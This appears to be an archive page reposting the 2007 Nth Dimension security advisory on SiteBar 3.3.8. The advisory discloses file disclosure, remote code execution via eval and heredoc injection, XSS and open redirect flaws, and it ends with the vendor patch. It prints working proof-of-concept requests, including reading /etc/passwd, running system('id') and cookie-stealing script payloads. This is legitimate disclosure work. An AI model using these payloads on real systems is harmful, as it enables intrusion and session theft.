what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

NDSA20071016.txt

NDSA20071016.txt
Posted Oct 22, 2007
Authored by Tim Brown | Site nth-dimension.org.uk

Nth Dimension Security Advisory (NDSA20071016) - The SiteBar application has single high risk issues with its translation module. It can can be made to retrieve any file to which the web server user has read access. The SiteBar application has multiple high risk issues with its translation module. It can be made to execute arbitrary code to gain remote access as the web server user typically nobody. The SiteBar application has multiple medium risk issues where it is vulnerable to Javascript injection within the requested URL. The SiteBar application has single medium risk issue where it is vulnerable to malicious redirects within the requested URL. Version 3.3.8 is affected.

tags | exploit, remote, web, arbitrary, javascript
advisories | CVE-2006-3320, CVE-2007-5492, CVE-2007-5491
SHA-256 | f9787ab6aeb07593ce7cda6de093a36855c1a84a926762bb230871ba4fa62bdb

NDSA20071016.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nth Dimension Security Advisory (NDSA20071016)
Date: 16th October 2007
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: SiteBar 3.3.8 <http://www.sitebar.org/>
Vendor: Ondřej Brablc, David Szego and SiteBar Team <http://www.sitebar.org/>
Risk: High

Summary

This advisory comes in 4 related parts:

1) SiteBar application has single high risk issues with its translation
module. It can can be made to retrieve any file to which the web server user
has read access.

2) SiteBar application has multiple high risk issues with its translation
module. It can be made to execute arbitrary code to gain remote access
as the web server user typically nobody.

3) SiteBar application has multiple medium risk issues where it is vulnerable
to Javascript injection within the requested URL.

4) SiteBar application has single medium risk issue where it is vulnerable to
malicious redirects within the requested URL.

Technical Details

1) The SiteBar application translation module can be made to read any
arbitrary file that the web server user has read access to, as it makes
no sanity checks on the value passed within the dir parameter of the URL,
for example:

http://192.168.1.1/translator.php?dir=/etc/passwd%00

Note the use of %00 to terminate the malicious and so prevent the intended
string concatenation occuring.

2) The SiteBar application translation module can be forced into code
execution can occur in one of two ways. Firstly, it makes no sanity checks
on the value passed within the edit parameter prior to using the value as
part of an eval() call, for example:

http://192.168.1.1/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22);

Secondly, whilst modifying strings within a translation, it makes no sanity
checks on the value passed for a given string to be embedded within a HERE
document within the languages strings library. It is therefore possible to
terminate the HERE document and pass arbitrary code which will be executed
whenever the languages strings library is included, for example:

POST http://192.168.1.1/translator.php?lang=test&edit=text HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/translator.php?lang=test&edit=text
Cookie: SB3COOKIE=1; SB3AUTH=3efab8d1dc9a149d7d1d7866a33d2539
Content-Type: application/x-www-form-urlencoded
Content-length: 47497

dir=&label%5B0%5D=The+Bookmark+Server+for+Personal+and+Team+Use&md5%5B0%5D=823084516ae27478ec4c5fd40fb32ea8&value%5B0%5D=_P;

system('id');

?>

Note that _P terminates the HERE document.

3) The values of the URL requested are used in within the web pages returned
by the various scripts, in their unsanitised form. Specifically, it makes
no sanity checks on the value passed within the multiple parameters of the
URL, for example:

http://192.168.1.1/integrator.php?lang="><script>alert('xss')</script> - Allows '
http://192.168.1.1/command.php?command=New+Password&uid=&token="><script>alert(document.cookie)</script> - Does not allow '
http://192.168.1.1/command.php?command=Folder%20Properties&nid_acl=%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow '
http://192.168.1.1/index.php?target=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow '
http://192.168.1.1/command.php?command='%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ', this one turned out to be CVE-2006-3320.
http://192.168.1.1/command.php?command=Modify%20User&uid=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E - Allows '

Note that CVE-2006-3320 had not been resolved at the time of testing, in
September 2007, and so we included it in our vulnerability report to the vendor
for completeness.

4) Finally, the SiteBar can be made to redirect users to malicious locations,
as it makes no checks on the value passed within the forward parameter of the URL,
for example:

http://192.168.1.1/command.php?command=Log%20In&forward=http://www.google.com/

Solutions

Following vendor notification on the 27th September 2007, the vendor promptly
responded with an initial patch on the 7th October which has been attached along
with this advisory and which resolved the reported issues. Nth Dimension would
recommend applying this patch as soon as possible. Alternatively, from 3.3.9
(available at http://sitebar.org/downloads.php) onwards also include this patch.
Nth Dimension would like to thank Ondraj from the SiteBar team for the way he
worked to resolve the issue.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHFo3OVAlO5exu9x8RAhLWAJ0Vw4cessVBHnFMswYp6aDlmriDnwCfXpil
wyDF4P/iRQ5Ab7FqJFutWBA=
=Oqb/
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close